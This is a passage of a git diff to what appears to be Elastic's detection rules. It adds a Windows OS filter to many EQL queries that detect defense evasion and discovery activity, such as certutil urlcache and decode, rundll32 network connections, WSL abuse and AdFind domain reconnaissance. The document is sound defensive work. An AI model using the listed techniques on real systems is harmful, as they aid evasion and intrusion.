where host.os.type == "windows" and registry.path : ( "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\Start", "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\*\\Start" ) and diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index 9e073f949..2f6d5d99c 100644 --- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -38,7 +38,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "certutil.exe" or process.pe.original_file_name == "CertUtil.exe") and process.args : ("?decode", "?encode", "?urlcache", "?verifyctl", "?encodehex", "?decodehex", "?exportPFX") ''' diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index c354d2f65..0f2722933 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.executable : "C:\\*" and +process where host.os.type == "windows" and event.type == "start" and process.executable : "C:\\*" and (process.working_directory : "?:\\" and not process.working_directory: "C:\\") and process.parent.name : "explorer.exe" and process.name : ("rundll32.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "regsvr32.exe", diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 2d128570b..38be37a16 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,9 +26,9 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=5m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.name : ("wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe", "regsvr32.exe", "svchost.exe", "dllhost.exe", "cmstp.exe")] - [file where event.type != "deletion" and + [file where host.os.type == "windows" and event.type != "deletion" and file.name : ("wscript.exe.log", "cscript.exe", "mshta.exe.log", diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml index ddac84a0f..e4076050f 100644 --- a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml +++ b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/11" integration = ["windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -88,7 +88,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.code == "10" and +process where host.os.type == "windows" and event.code == "10" and length(winlog.event_data.CallTrace) > 0 and /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */ diff --git a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml index fb47ca12b..22f8ba755 100644 --- a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml +++ b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -53,7 +53,7 @@ type = "eql" query = ''' sequence by host.id with maxspan=1m - [process where event.code == "1" and + [process where host.os.type == "windows" and event.code == "1" and /* sysmon process creation */ process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "eqnedt32.exe", "fltldr.exe", "mspub.exe", "msaccess.exe","cscript.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", @@ -70,7 +70,7 @@ sequence by host.id with maxspan=1m process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")) and not (process.parent.name : "regsvr32.exe" and process.parent.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")) ] by process.parent.entity_id, process.entity_id - [process where event.code == "10" and + [process where host.os.type == "windows" and event.code == "10" and /* Sysmon process access event from unknown module */ winlog.event_data.CallTrace : "*UNKNOWN*"] by process.entity_id, winlog.event_data.TargetProcessGUID ''' diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index afd460234..a4acedba6 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=2m - [process where event.type == "start" + [process where host.os.type == "windows" and event.type == "start" and (process.code_signature.subject_name in ("Microsoft Corporation", "Microsoft Windows") and process.code_signature.trusted == true) and not process.executable : ( @@ -46,7 +46,7 @@ sequence by process.entity_id with maxspan=2m "?:\\Windows\\SysWOW64\\mobsync.exe", "?:\\Windows\\System32\\cmd.exe", "?:\\Windows\\SysWOW64\\cmd.exe")] - [library where event.type == "start" and dll.name : "scrobj.dll"] + [library where host.os.type == "windows" and event.type == "start" and dll.name : "scrobj.dll"] ''' diff --git a/rules/windows/defense_evasion_suspicious_short_program_name.toml b/rules/windows/defense_evasion_suspicious_short_program_name.toml index a5a42303f..ddea1b831 100644 --- a/rules/windows/defense_evasion_suspicious_short_program_name.toml +++ b/rules/windows/defense_evasion_suspicious_short_program_name.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,8 +29,8 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and length(process.name) > 0 and - length(process.name) == 5 and host.os.name == "Windows" and length(process.pe.original_file_name) > 5 +process where host.os.type == "windows" and event.type == "start" and length(process.name) > 0 and + length(process.name) == 5 and length(process.pe.original_file_name) > 5 ''' diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index 72671aef2..2419da35e 100644 --- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,11 +25,11 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan = 2m -[process where event.type == "start" and +[process where host.os.type == "windows" and event.type == "start" and (process.name : "WMIC.exe" or process.pe.original_file_name : "wmic.exe") and process.args : ("format*:*", "/format*:*", "*-format*:*") and not process.command_line : "* /format:table *"] -[any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and +[any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : ("jscript.dll", "vbscript.dll") or file.name : ("jscript.dll", "vbscript.dll"))] ''' diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index 0614d257f..5949b2752 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml +++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "Zoom.exe" and process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") ''' diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index 51196d9fb..6769d6a78 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -87,7 +87,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.extension : ("exe", "dll") and process.name : ("smss.exe", "autochk.exe", diff --git a/rules/windows/defense_evasion_timestomp_sysmon.toml b/rules/windows/defense_evasion_timestomp_sysmon.toml index 5702483c5..8bfed4516 100644 --- a/rules/windows/defense_evasion_timestomp_sysmon.toml +++ b/rules/windows/defense_evasion_timestomp_sysmon.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/17" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.code : "2" and +file where host.os.type == "windows" and event.code : "2" and /* Requires Sysmon EventID 2 - File creation time change */ event.action : "File creation time changed*" and diff --git a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml index f50c1cd13..320bb0333 100644 --- a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml +++ b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml @@ -4,7 +4,7 @@ maturity = "production" integration = ["endpoint"] min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.4.0" -updated_date = "2022/11/22" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -library where +library where host.os.type == "windows" and process.code_signature.trusted == true and diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index 23a1c5593..3a3227421 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/27" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -library where process.pid == 4 and +library where host.os.type == "windows" and process.pid == 4 and dll.code_signature.trusted != true and not dll.code_signature.status : ("errorExpired", "errorRevoked") ''' diff --git a/rules/windows/defense_evasion_unusual_ads_file_creation.toml b/rules/windows/defense_evasion_unusual_ads_file_creation.toml index 9290a78e3..81455185f 100644 --- a/rules/windows/defense_evasion_unusual_ads_file_creation.toml +++ b/rules/windows/defense_evasion_unusual_ads_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -85,7 +85,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and file.path : "C:\\*:*" and not file.path : "C:\\*:zone.identifier*" and diff --git a/rules/windows/defense_evasion_unusual_dir_ads.toml b/rules/windows/defense_evasion_unusual_dir_ads.toml index 5d4a1eec4..1b713e8e0 100644 --- a/rules/windows/defense_evasion_unusual_dir_ads.toml +++ b/rules/windows/defense_evasion_unusual_dir_ads.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.args : "?:\\*:*" and process.args_count == 1 ''' diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index 3d4e5e6e6..1e8d05fea 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,8 +30,8 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1m - [process where event.type == "start" and process.name : "dllhost.exe" and process.args_count == 1] - [network where process.name : "dllhost.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "dllhost.exe" and process.args_count == 1] + [network where host.os.type == "windows" and process.name : "dllhost.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml index f804fa245..e7fdef8f0 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -61,8 +61,8 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1m - [process where event.type == "start" and process.name : "rundll32.exe" and process.args_count == 1] - [network where process.name : "rundll32.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "rundll32.exe" and process.args_count == 1] + [network where host.os.type == "windows" and process.name : "rundll32.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 6bd5ac669..0b9943161 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -52,7 +52,7 @@ type = "eql" query = ''' sequence by process.entity_id - [process where (process.name : "Microsoft.Workflow.Compiler.exe" or + [process where host.os.type == "windows" and (process.name : "Microsoft.Workflow.Compiler.exe" or process.name : "bginfo.exe" or process.name : "cdb.exe" or process.name : "cmstp.exe" or @@ -65,7 +65,7 @@ sequence by process.entity_id process.name : "rcsi.exe" or process.name : "xwizard.exe") and event.type == "start"] - [network where (process.name : "Microsoft.Workflow.Compiler.exe" or + [network where host.os.type == "windows" and (process.name : "Microsoft.Workflow.Compiler.exe" or process.name : "bginfo.exe" or process.name : "cdb.exe" or process.name : "cmstp.exe" or diff --git a/rules/windows/defense_evasion_unusual_system_vp_child_program.toml b/rules/windows/defense_evasion_unusual_system_vp_child_program.toml index 0b2ab42b0..914b22e9f 100644 --- a/rules/windows/defense_evasion_unusual_system_vp_child_program.toml +++ b/rules/windows/defense_evasion_unusual_system_vp_child_program.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.pid == 4 and not process.executable : ("Registry", "MemCompression", "?:\\Windows\\System32\\smss.exe") ''' diff --git a/rules/windows/defense_evasion_via_filter_manager.toml b/rules/windows/defense_evasion_via_filter_manager.toml index 627367799..063ed450d 100644 --- a/rules/windows/defense_evasion_via_filter_manager.toml +++ b/rules/windows/defense_evasion_via_filter_manager.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "fltMC.exe" and process.args : "unload" ''' diff --git a/rules/windows/defense_evasion_workfolders_control_execution.toml b/rules/windows/defense_evasion_workfolders_control_execution.toml index c24fe8aa5..8c7a51291 100644 --- a/rules/windows/defense_evasion_workfolders_control_execution.toml +++ b/rules/windows/defense_evasion_workfolders_control_execution.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -73,7 +73,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" +process where host.os.type == "windows" and event.type == "start" and process.name : "control.exe" and process.parent.name : "WorkFolders.exe" and not process.executable : ("?:\\Windows\\System32\\control.exe", "?:\\Windows\\SysWOW64\\control.exe") ''' diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index 3b663b981..9a4ccb9c5 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/13" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type : "start" and +process where host.os.type == "windows" and event.type : "start" and ( ((process.executable : "?:\\Windows\\System32\\bash.exe" or process.pe.original_file_name == "Bash.exe") and not process.command_line : ("bash", "bash.exe")) or diff --git a/rules/windows/defense_evasion_wsl_child_process.toml b/rules/windows/defense_evasion_wsl_child_process.toml index 0b292074f..d06db7e0e 100644 --- a/rules/windows/defense_evasion_wsl_child_process.toml +++ b/rules/windows/defense_evasion_wsl_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/12" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type : "start" and +process where host.os.type == "windows" and event.type : "start" and process.parent.executable : ("?:\\Windows\\System32\\wsl.exe", "?:\\Program Files*\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux_*\\wsl.exe", diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 22cd6db25..22516769f 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/13" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type : "start" and +process where host.os.type == "windows" and event.type : "start" and (process.name : "Dism.exe" or process.pe.original_file_name == "DISM.EXE") and process.command_line : "*Microsoft-Windows-Subsystem-Linux*" ''' diff --git a/rules/windows/defense_evasion_wsl_filesystem.toml b/rules/windows/defense_evasion_wsl_filesystem.toml index fa8b181ba..543a35c65 100644 --- a/rules/windows/defense_evasion_wsl_filesystem.toml +++ b/rules/windows/defense_evasion_wsl_filesystem.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/12" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=5m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "dllhost.exe" and /* Plan9FileSystem CLSID - WSL Host File System Worker */ process.command_line : "*{DFB65C4C-B34F-435D-AFE9-A86218684AA8}*"] - [file where process.name : "dllhost.exe" and not file.path : "?:\\Users\\*\\Downloads\\*"] + [file where host.os.type == "windows" and process.name : "dllhost.exe" and not file.path : "?:\\Users\\*\\Downloads\\*"] ''' diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 3c2af853a..77d7a7363 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml +++ b/rules/windows/defense_evasion_wsl_kalilinux.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/12" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( (process.name : "wsl.exe" and process.args : ("-d", "--distribution", "-i", "--install") and process.args : "kali*") or process.executable : diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml index 8a205ce4f..dcf48d0e8 100644 --- a/rules/windows/defense_evasion_wsl_registry_modification.toml +++ b/rules/windows/defense_evasion_wsl_registry_modification.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/12" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.path : ("HK*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\*\\PackageFamilyName", "\\REGISTRY\\*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\*\\PackageFamilyName") diff --git a/rules/windows/discovery_adfind_command_activity.toml b/rules/windows/discovery_adfind_command_activity.toml index 4f7ff2c6c..6133f4cf8 100644 --- a/rules/windows/discovery_adfind_command_activity.toml +++ b/rules/windows/discovery_adfind_command_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -73,7 +73,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "AdFind.exe" or process.pe.original_file_name == "AdFind.exe") and process.args : ("objectcategory=computer", "(objectcategory=computer)", "objectcategory=person", "(objectcategory=person)", diff --git a/rules/windows/discovery_admin_recon.toml b/rules/windows/discovery_admin_recon.toml index 73a8dc7b0..0a88a9387 100644 --- a/rules/windows/discovery_admin_recon.toml +++ b/rules/windows/discovery_admin_recon.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -61,7 +61,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( (((process.name : "net.exe" or process.pe.original_file_name == "net.exe") or ((process.name : "net1.exe" or process.pe.original_file_name == "net1.exe") and diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml index 4891fb998..8ac39d0e3 100644 --- a/rules/windows/discovery_command_system_account.toml +++ b/rules/windows/discovery_command_system_account.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -58,7 +58,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (?process.Ext.token.integrity_level_name : "System" or ?winlog.event_data.IntegrityLevel : "System") and (process.name : "whoami.exe" or diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml index f8bec73ea..d4946f591 100644 --- a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml +++ b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "dsquery.exe" or process.pe.original_file_name: "dsquery.exe") and process.args : "*objectClass=trustedDomain*" ''' diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml b/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml index 9911c0564..f9ffae75f 100644 --- a/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml +++ b/rules/windows/discovery_enumerating_domain_trusts_via_nltest.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -40,7 +40,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "nltest.exe" and process.args : ( "/DCLIST:*", "/DCNAME:*", "/DSGET*", "/LSAQUERYFTI:*", "/PARENTDOMAIN", diff --git a/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml b/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml index 11bb10015..ca2e9ff24 100644 --- a/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml +++ b/rules/windows/discovery_files_dir_systeminfo_via_cmd.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -55,7 +55,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "cmd.exe" and process.args : "/c" and process.args : ("set", "dir") ''' diff --git a/rules/windows/discovery_group_policy_object_discovery.toml b/rules/windows/discovery_group_policy_object_discovery.toml index 2b585b6f3..61892a1df 100644 --- a/rules/windows/discovery_group_policy_object_discovery.toml +++ b/rules/windows/discovery_group_policy_object_discovery.toml 